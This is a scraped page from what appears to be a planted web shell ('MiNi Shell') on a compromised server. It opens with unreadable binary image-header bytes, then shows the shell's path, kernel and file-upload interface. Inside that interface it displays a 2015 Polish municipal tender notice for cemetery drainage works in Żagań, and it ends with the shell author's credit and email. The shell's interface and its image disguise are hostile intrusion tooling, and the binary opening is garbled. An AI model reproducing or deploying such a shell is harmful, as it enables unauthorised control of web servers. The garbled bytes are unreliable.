JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/35496-N-2015.html

<p class="kh_header"><b>Żagań: WYKONANIE ODWODNIENIA NOWEJ KWATERY CMENTARZA KOMUNALNEGO PRZY ULICY KOŻUCHOWSKIEJ W ŻAGANIU</b><br>
<b>Numer ogłoszenia: 35496 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ODWODNIENIA NOWEJ KWATERY CMENTARZA KOMUNALNEGO PRZY ULICY KOŻUCHOWSKIEJ W ŻAGANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2. Przedmiotem zamówienia  jest wykonanie robót związanych z budową drenażu w celu obniżenia poziomu wód gruntowych w sektorze IV cmentarza komunalnego przy ulicy Kożuchowskiej w Żaganiu. Lubuski Wojewódzki Konserwator Zabytków w zielonej Górze w dniu 22 grudnia 2014 roku wydał decyzję znak ZN.5142.106.2014 (mŻag) zezwalającą na prowadzenie robót budowlanych w otoczeniu zabytku - zespołu urbanistyczno-krajobrazowego Żagania, wpisanego do rejestru pod nr 70 i 2169 polegających ba budowie drenażu - odwodnienia sektora cmentarza komunalnego, zlokalizowanego na działkach o nr ew. 735 i 736 położonych przy ulicy Kożuchowskiej w Żaganiu.
Projektowany drenaż przebiegać będzie na całej swojej długości pod ziemią.  Zbieracza o 1/o2= 180/200 mm prowadzony jest w istniejącej alejce żwirowej, równolegle do istniejącego kanału K- o,30. Przebiega w linii łamanej przez teren działek 735 i 736. Zmiana kierunku następuje na bez włazowych studniach rewizyjnych, zwieńczonych włazami żeliwnymi o 315 mm. Prostopadle do zwieracza ułożone będą sączki o średnicy o1/o2=113/128 mm, ułożone w osi ciągów pieszych pomiędzy kwaterami grobów. 
Przed włączeniem się do istniejącej studni na sieci miejskiej na zbieraczu montowany będzie centralny łapacz piasku o średnicy 1200mm, zwieńczony płytą nad studzienną i włazem żeliwnym o 600 w klasie D400. Odbiornikiem wód drenażowych oraz wód opadowych i roztopowych z terenu będzie istniejąca studnia rewizyjna o 1200 mm na czynnym kanale miejskiej sieci kanalizacji deszczowej K-0,30.   
Na etapie prac ziemnych przewidziano wykonanie obniżenia poziomu wody gruntowej. 
       
3 2. Dodatkowe informacje do przedmiotu zamówienia:
    1) załączony do SIWZ przedmiar robót jest wyłącznie dokumentem  pomocniczym dla 
        Wykonawcy w celu zapoznania się z wielkością  przedmiotu  zamówienia i nie stanowi 
        podstawy do ustalenia wynagrodzenia ryczałtowego,
   2) Wykonawca  jest zobowiązany sporządzić kalkulację ceny ( wynagrodzenia 
       ryczałtowego) za wykonanie przedmiotu zamówienia  na podstawie załączonej do SIWZ     
       dokumentacji projektowej i  po  dokonaniu wizji oraz  obmiaru na obiekcie będącym 
       przedmiotem zamówienia. 
       Wykonawca  powinien przewidzieć  i skalkulować wszelkie  niezbędne do prawidłowego 
       wykonania przedmiotu  zamówienia roboty i prace,
   3) Wykonawca  sporządzi dla celów poglądowych Zamawiającego kosztorys ofertowy  
       przewidywanych do wykonania robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.54.00-1, 45.10.00.00-8, 45.23.24.52-5, 45.23.24.40-8, 45.11.12.40-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE ŻĄDA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia   
     posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nie nakładają  
     obowiązku posiadania  takowych uprawnień typu koncesja, zezwolenie, licencja,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten 
    wymóg Wykonawcę,  który w okresie ostatnich  pięciu lat przed upływem składania ofert , 
    a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie,  wykonał co najmniej 
    jedną robotę budowlaną,  polegającą na wykonaniu odwodnienia gruntu.    
    Na potwierdzenie spełnienia tego warunku  Wykonawca złoży wraz z ofertą dokument 
    określony w punkcie 6.1  podpunkt 2 SIWZ. 
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
    Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od 
    charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
    obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
    trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
    potrzeby  wykonania zamówienia oraz składając dokumenty dotyczące tego podmiotu 
    określone w punkcie 6.2 SIWZ. Podmiot, który zobowiązał się do udostepnienia zasobów 
    odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek
    nieudostępnienia tych zasobów, chyba że za  nieudostępnienie zasobów nie ponosi  winy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania  osobami zdolnymi  do wykonania zamówienia, Zamawiający 
    uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował co najmniej 
    jedną osobą : 
    - posiadającą uprawnienia budowlane do kierowania robotami  budowlanymi w 
      specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych bez 
      ograniczeń lub dysponującą innymi uprawnieniami  umożliwiającymi wykonywanie tych 
      samych czynności, do wykonywania których  uprawniają w aktualnym stanie prawnym 
      uprawnienia w w/w  specjalności.
    Na potwierdzenie spełnienia powyższych warunków, Wykonawca złoży wraz z ofertą 
    dokument  określony w  punkcie 6.1 podpunkt 3 SIWZ 
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
    W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca 
    może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego 
    łączących go z nimi stosunków.  Wykonawca w takiej sytuacji obowiązany jest udowodnić    
    Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w    
    szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do 
    oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia 
    oraz składając dokumenty dotyczące tego podmiotu określone w punkcie 6.2 SIWZ.
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, 
    chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający uzna za spełniającego te 
    wymogi tego Wykonawcę, który  będzie ubezpieczony   od odpowiedzialności cywilnej w 
    zakresie prowadzonej działalności  gospodarczej związanej z przedmiotem zamówienia  i 
    na potwierdzenie  spełnienia tego warunku złoży wraz z ofertą  dokument określony w 
    punkcie 6.1 podpunkt 4 SIWZ.  
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania i złożenia poświadczeń o należytym  bądź nienależytym wykonaniu 
    robót budowlanych wymienionych w wykazie, dotyczy najważniejszych robót,  
    polegających na wykonaniu odwodnienia gruntu.     
    W przypadku gdy Zamawiający jest podmiotem na rzecz którego roboty  wskazane w 
    wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
    poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>DLA CELÓW POGLĄDOWYCH - KOSZOTRYS OFERTOWY</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy :
1) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem  że:  
   a) zachodzi konieczność wykonania robót dodatkowych (zamówienie dodatkowe w  
       oparciu o  art. 67 ust.1 pkt.5 ustawy Prawo zamówień publicznych) na zadaniu o 
       wykonanie robót budowanych, których wykonanie w sposób obiektywny uniemożliwia 
       terminowe zakończenie realizacji przedmiotu zamówienia,  
   b) prace objęte umową o wykonanie robót budowlanych zostały wstrzymane przez 
       właściwe organy z przyczyn niezależnych od Wykonawcy, 
   c) wystąpiły nietypowe dla  danej pory roku  warunki atmosferyczne, które ze względów 
       obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie z normami  
       techniczno-budowlanymi, co uniemożliwia  terminowe zakończenie realizacji przedmiotu 
       umowy,
   d) w wyniku działania siły wyżej (klęski żywiołowe :  trzęsienia ziemi, pożary, powodzie,  
       tornada,  wichury itp.), mające wpływ na terminowość robót budowlanych, 
   e) zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie   planowania 
       inwestycji o wykonanie robót budowlanych danych,  zgody osób trzecich  lub właściwych 
       organów. 
   Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub postoju;    
2) w zakresie zmiany lub rezygnacji z podwykonawcy : 
   a)  na którego zasoby Wykonawca  powoływał się w celu wykazania spełnienia warunków 
        udziału w postepowaniu, lub 
   b)  z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia   
        publicznego,   pod warunkiem, że : 
        - Wykonawca  wykaże, iż proponowany inny podwykonawca spełni warunki udziału w 
          postepowaniu w stopniu nie mniejszym niż wymagany w trakcie postepowania o 
          udzielenie zamówienia; lub 
       -  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w 
          stopniu nie mniejszym niż wymagany w trakcie postpowania o udzielenie zamówienia; 
3) w zakresie zmiany kierownika budowy , za uprzednią pisemną zgodą Zamawiającego, 
     w przypadku, gdy: 
     a) Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w  przypadku  
           - choroby lub innych zdarzeń losowych dotyczących kierownika, 
           - nie wywiązywania się kierownika budowy z obowiązków wynikających z Umowy 
              zawartej w ramach przedmiotowego zamówienia, 
           - jeżeli zmiana kierownika budowy stanie się konieczną z jakichkolwiek przyczyn 
             niezależnych od Wykonawcy (np. rezygnacji), 
     b) Zamawiający zażąda  zmiany kierownika budowy gdy  uzna, że nie wykonuje on 
          swoich obowiązków wynikających z Umowy zawartej w ramach przedmiotowego 
          zamówienia bądź unika kontaktu  z inwestorem.. 
     W przypadku zmiany kierownika budowy, nowy kierownik budowy musi spełniać
     wymagania określone w Ogłoszeniu o zamówieniu dla powyższych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.um.zagan.pl          w BIP w zakladce przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy  
Urząd Miasta Żagań, plac Słowiański 17, Wydział Zamówień Publicznych i Nadzoru Właścicielskiego, pok. nr 26,  68-100 Żagań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2015 godzina 11:00, miejsce: Urząd Miasta Żagań, plac Słowiański 17, Wydział Zamówień Publicznych i Nadzoru Właścicielskiego, pok. nr 26,  68-100 Żagań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com